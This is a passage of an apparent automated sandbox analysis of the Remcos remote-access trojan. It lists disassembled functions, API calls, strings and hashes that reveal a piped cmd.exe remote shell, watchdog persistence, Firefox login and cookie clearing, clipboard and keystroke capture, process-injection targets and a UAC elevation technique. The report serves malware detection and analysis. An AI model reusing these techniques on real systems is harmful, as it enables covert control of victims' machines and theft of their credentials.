                                                                  • Part of subcall function 0041CA73: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                                • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                                                • API String ID: 1067849700-181434739
                                                                • Opcode ID: d116e15542ec9ea566ddb8834446e92c621402b8b77c1a65adbef748b600aba7
                                                                • Instruction ID: f533dcafa702064eae222fc9ff54aa9327b172b3479e3db69e1c842a3252ef64
                                                                • Opcode Fuzzy Hash: d116e15542ec9ea566ddb8834446e92c621402b8b77c1a65adbef748b600aba7
                                                                • Instruction Fuzzy Hash: F04293716043016BC604FB76C9579AE77A9AF91348F80483FF542671E2EF7C9908879B
                                                                Function 0040569A Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 278pipesleepfileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __Init_thread_footer.LIBCMT ref: 004056E6
                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                • __Init_thread_footer.LIBCMT ref: 00405723
                                                                • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660CC,00000000), ref: 004057B6
                                                                • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                                                • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                                                • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                                                • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                                                  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660D0,00000062,004660B4), ref: 004059E4
                                                                • Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
                                                                • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                                                • CloseHandle.KERNEL32 ref: 00405A23
                                                                • CloseHandle.KERNEL32 ref: 00405A2B
                                                                • CloseHandle.KERNEL32 ref: 00405A3D
                                                                • CloseHandle.KERNEL32 ref: 00405A45
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                                                • API String ID: 2994406822-18413064
                                                                • Opcode ID: 5497d89eb2bfe0b7b7afbdacb2e666ef99fa94f9d1fd0b450e67ad54fc0b207d
                                                                • Instruction ID: feb7c3e087fbbfe745e3798ef664df189eb35a760580a6c3fca7c2e5343dee52
                                                                • Opcode Fuzzy Hash: 5497d89eb2bfe0b7b7afbdacb2e666ef99fa94f9d1fd0b450e67ad54fc0b207d
                                                                • Instruction Fuzzy Hash: 1A91C271604604AFD711FB36ED42A6B369AEB84308F01443FF589A62E2DB7D9C448F6D
                                                                Function 00412132 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 238threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetCurrentProcessId.KERNEL32 ref: 00412141
                                                                  • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                  • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                                                  • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                                                • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412181
                                                                • CloseHandle.KERNEL32(00000000), ref: 00412190
                                                                • CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
                                                                • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                                • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                                • API String ID: 3018269243-13974260
                                                                • Opcode ID: 868a51c02de72cecf5e4470023d2170e4a1c4714e6dee9bf4973fafcfeb68822
                                                                • Instruction ID: f1b014459f2de55ad39b9ce4e2eab06dd530905b6b6ad57ecd0cf2e75cce6712
                                                                • Opcode Fuzzy Hash: 868a51c02de72cecf5e4470023d2170e4a1c4714e6dee9bf4973fafcfeb68822
                                                                • Instruction Fuzzy Hash: B971A23160430167C614FB72CD579AE77A4AE94308F40097FF586A21E2FFBC9A49C69E
                                                                Function 0040BB6B Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
                                                                • FindClose.KERNEL32(00000000), ref: 0040BC04
                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
                                                                • FindClose.KERNEL32(00000000), ref: 0040BD4D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Find$CloseFile$FirstNext
                                                                • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                • API String ID: 1164774033-3681987949
                                                                • Opcode ID: 1dd2d77424a1feb7b81cbbfb01062b06d0993b8648acb28e4275aca406a32408
                                                                • Instruction ID: 8b0b2ff803da1d4b435a108118727fe7c74031c8ac088da8990f7d135a86af9b
                                                                • Opcode Fuzzy Hash: 1dd2d77424a1feb7b81cbbfb01062b06d0993b8648acb28e4275aca406a32408
                                                                • Instruction Fuzzy Hash: C7514F3190021A9ADB14FBB2DC56AEEB739AF10304F50057FF506721E2FF785A49CA99
                                                                Function 004168FC Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80clipboardmemoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • OpenClipboard.USER32 ref: 004168FD
                                                                • EmptyClipboard.USER32 ref: 0041690B
                                                                • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
                                                                • GlobalLock.KERNEL32(00000000), ref: 00416934
                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0041696A
                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00416973
                                                                • CloseClipboard.USER32 ref: 00416990
                                                                • OpenClipboard.USER32 ref: 00416997
                                                                • GetClipboardData.USER32(0000000D), ref: 004169A7
                                                                • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                                • CloseClipboard.USER32 ref: 004169BF
                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                • String ID: !D@
                                                                • API String ID: 3520204547-604454484
                                                                • Opcode ID: a471b31b0e2848d44592c209c65a27511ae0bedd1fb0e9bf63a88f6136bceacb
                                                                • Instruction ID: 548dc4d81477911aad8e8b192ef25fd2d65b79b2884d290c2f7190e4363fe536
                                                                • Opcode Fuzzy Hash: a471b31b0e2848d44592c209c65a27511ae0bedd1fb0e9bf63a88f6136bceacb
                                                                • Instruction Fuzzy Hash: 23215171204301EBD714BB71DC5DAAE7AA9AF88746F00043EF946961E2EF3C8C45866A
                                                                Function 0040BD72 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
                                                                • FindClose.KERNEL32(00000000), ref: 0040BE04
                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
                                                                • FindClose.KERNEL32(00000000), ref: 0040BEEA
                                                                • FindClose.KERNEL32(00000000), ref: 0040BF0B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Find$Close$File$FirstNext
                                                                • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                • API String ID: 3527384056-432212279
                                                                • Opcode ID: 0e02877a0a7a0854a613cb848fbdcbf87c912738fbad3b4f45ae5d99c19712fd
                                                                • Instruction ID: 490896facf616f27299b965c2ba25c256be2621490ca3b25f990f1d956524bcc
                                                                • Opcode Fuzzy Hash: 0e02877a0a7a0854a613cb848fbdcbf87c912738fbad3b4f45ae5d99c19712fd
                                                                • Instruction Fuzzy Hash: E0417F3190021AAACB04F7B2DC5A9EE7769AF11704F50057FF506B21E2EF385A458A9D
                                                                Function 0040F4AF Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 210processCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F4C9
                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00475338), ref: 0040F4F4
                                                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
                                                                • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F59E
                                                                  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                • CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F6A9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                                • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                                                • API String ID: 3756808967-1743721670
                                                                • Opcode ID: 1d3c19fb237022e801d10a57cb3e4ad5faa3765b37f293df49325fb65a29b400
                                                                • Instruction ID: 73d50abc618c2a3d6a57d9d5b79267519347fdb4c989691d2635b3abfd1995a7
                                                                • Opcode Fuzzy Hash: 1d3c19fb237022e801d10a57cb3e4ad5faa3765b37f293df49325fb65a29b400
                                                                • Instruction Fuzzy Hash: B5712E705083419AC724FB21D8959AEB7E4AF90348F40483FF586631E3EF79994DCB9A
                                                                Function 00419662 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 206COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 0$1$2$3$4$5$6$7$VG
                                                                • API String ID: 0-1861860590
                                                                • Opcode ID: e6a777f80bf8230cc7af5635f6fa1f38021a03d05ab0836674c6e7259f08b149
                                                                • Instruction ID: 7133b754bba813e7b371628f59950815dc208a5c28e1558ec9b3f3725e93ffbd
                                                                • Opcode Fuzzy Hash: e6a777f80bf8230cc7af5635f6fa1f38021a03d05ab0836674c6e7259f08b149
                                                                • Instruction Fuzzy Hash: 9171E2709183019FD704EF21D862BAB7B94DF85710F00492FF5A26B2D1DE78AB49CB96
                                                                Function 00407538 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _wcslen.LIBCMT ref: 0040755C
                                                                • CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Object_wcslen
                                                                • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                • API String ID: 240030777-3166923314
                                                                • Opcode ID: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                                                • Instruction ID: 28daeeabb8f9d0779e909056d36d27ae9c6096be3406941992b1a3e854751cf1
                                                                • Opcode Fuzzy Hash: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                                                • Instruction Fuzzy Hash: 88113771D04214B6D710EA959845BDEB77C9B08714F15006FF904B2281EB7CAE448A6F
                                                                Function 0041A7D9 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A7EF
                                                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
                                                                • GetLastError.KERNEL32 ref: 0041A84C
                                                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                • String ID:
                                                                • API String ID: 3587775597-0
                                                                • Opcode ID: 4accfa2daad176f8b5f28278118318dfa0062abe9eed3b7a7428a28b758f59c5
                                                                • Instruction ID: 52116c85fb856a5ac6c14b0259405ec20ae2fa8d9cc538ef9907a440d1633313
                                                                • Opcode Fuzzy Hash: 4accfa2daad176f8b5f28278118318dfa0062abe9eed3b7a7428a28b758f59c5
                                                                • Instruction Fuzzy Hash: 17817071104301ABC304EF61D885DAFB7A8FF94749F50082EF185521A2EF78EE49CB9A
                                                                Function 00452690 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045279C
                                                                • IsValidCodePage.KERNEL32(00000000), ref: 004527F7
                                                                • IsValidLocale.KERNEL32(?,00000001), ref: 00452806
                                                                • GetLocaleInfoW.KERNEL32(?,00001001,JD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
                                                                • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 0045286D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                • String ID: JD$JD$JD
                                                                • API String ID: 745075371-3517165026
                                                                • Opcode ID: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                                • Instruction ID: 3c84011e7dbdf7a6f9673bc5a23f9f2f22d5020eb6794df094384b3d0215d6fb
                                                                • Opcode Fuzzy Hash: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                                • Instruction Fuzzy Hash: 9B518571900205ABDB10DFA5CD45ABF77B8EF0A702F04046BED14E7292E7B89948CB69
                                                                Function 0040C388 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
                                                                • FindClose.KERNEL32(00000000), ref: 0040C4B8
                                                                • FindClose.KERNEL32(00000000), ref: 0040C4E3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Find$CloseFile$FirstNext
                                                                • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                • API String ID: 1164774033-405221262
                                                                • Opcode ID: f2da73c484f202d7703831838b7ab11600cf4b2b9c4a90d68e51a9d5948ffb1b
                                                                • Instruction ID: 33618048715e6b2d4a7b39963b1e19558724686ef99070a322097c87c0ca4c0c
                                                                • Opcode Fuzzy Hash: f2da73c484f202d7703831838b7ab11600cf4b2b9c4a90d68e51a9d5948ffb1b
                                                                • Instruction Fuzzy Hash: 59313E31500219AACB14E761DC9A9EE7778AF50719F10057FF106B21E2EF7C9946CA4D
                                                                Function 0041C322 Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C37D
                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3AD
                                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C41F
                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C42C
                                                                  • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C402
                                                                • GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C44D
                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C463
                                                                • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C46A
                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C473
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                • String ID:
                                                                • API String ID: 2341273852-0
                                                                • Opcode ID: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                                • Instruction ID: 53b23dfad01ba0d5beec27b7c27070a1caf437d6ccbc5233b8522822963bc02e
                                                                • Opcode Fuzzy Hash: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                                • Instruction Fuzzy Hash: 4A31807284431CAADB24E761DC89EEB736CAF09305F0405FBF559D2051EB3DDAC98A58
                                                                Function 00419B86 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 245fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
                                                                • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
                                                                  • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$Find$CreateFirstNext
                                                                • String ID: 8SG$PXG$PXG$NG$PG
                                                                • API String ID: 341183262-3812160132
                                                                • Opcode ID: 0115e9c2cb1ce588966712d627a94d89128a79b5abd3d317653916e724f96c97
                                                                • Instruction ID: 0eaaaed992bec346a468a6d62c1d6888972f0568f5be94e2eef244f320132bd5
                                                                • Opcode Fuzzy Hash: 0115e9c2cb1ce588966712d627a94d89128a79b5abd3d317653916e724f96c97
                                                                • Instruction Fuzzy Hash: 998151315083415BC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                                                Function 0040A41B Relevance: 12.1, APIs: 8, Instructions: 112keyboardthreadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetForegroundWindow.USER32(?,?,004750F0), ref: 0040A451
                                                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                                • GetKeyboardLayout.USER32(00000000), ref: 0040A464
                                                                • GetKeyState.USER32(00000010), ref: 0040A46E
                                                                • GetKeyboardState.USER32(?,?,004750F0), ref: 0040A479
                                                                • ToUnicodeEx.USER32(00475144,?,?,?,00000010,00000000,00000000), ref: 0040A49C
                                                                • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
                                                                • ToUnicodeEx.USER32(00475144,?,?,?,00000010,00000000,00000000), ref: 0040A535
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                • String ID:
                                                                • API String ID: 1888522110-0
                                                                • Opcode ID: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                                                • Instruction ID: fd17a64e9e4f7f825196359ceba3421c6f582a70c0a4c9d277f8a97da3dc7bda
                                                                • Opcode Fuzzy Hash: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                                                • Instruction Fuzzy Hash: 1E316D72504308BFD700DF90DC45F9B7BECBB88744F00083AB645D61A0D7B5E9498BA6
                                                                Function 00414005 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 382registrylibraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140D8
                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140E4
                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004142A5
                                                                • GetProcAddress.KERNEL32(00000000), ref: 004142AC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                • API String ID: 2127411465-314212984
                                                                • Opcode ID: 8f57745345b6b33c555390ccc76dc69042d1fc98023fb94b573a666b921eb430
                                                                • Instruction ID: 51cedef5a77654bf04fe1bae55708f30d4330cefe0c145b830acf249c6506b6e
                                                                • Opcode Fuzzy Hash: 8f57745345b6b33c555390ccc76dc69042d1fc98023fb94b573a666b921eb430
                                                                • Instruction Fuzzy Hash: 16B1F671A0430066CA14FB76DC579AF36A85F91788F40053FB906771E2EE7D8A48C6DA
                                                                Function 00449210 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _free.LIBCMT ref: 00449292
                                                                • _free.LIBCMT ref: 004492B6
                                                                • _free.LIBCMT ref: 0044943D
                                                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                                • _free.LIBCMT ref: 00449609
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                • String ID:
                                                                • API String ID: 314583886-0
                                                                • Opcode ID: 9c19945c278a23a6cbe8007f4321121d5ad8c4a29b943f261e78237048aa55b9
                                                                • Instruction ID: 020e1479f4dc59d8c1013f8997fe2690be381d41ecad25fd3e4808fcef6bdafa
                                                                • Opcode Fuzzy Hash: 9c19945c278a23a6cbe8007f4321121d5ad8c4a29b943f261e78237048aa55b9
                                                                • Instruction Fuzzy Hash: E0C13A71900205ABFB24DF79CD41AAF7BA8EF46314F2405AFE884D7291E7788D42D758
                                                                Function 004167EF Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 97libraryloadershutdownCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                                  • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                                  • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                                  • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                                  • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
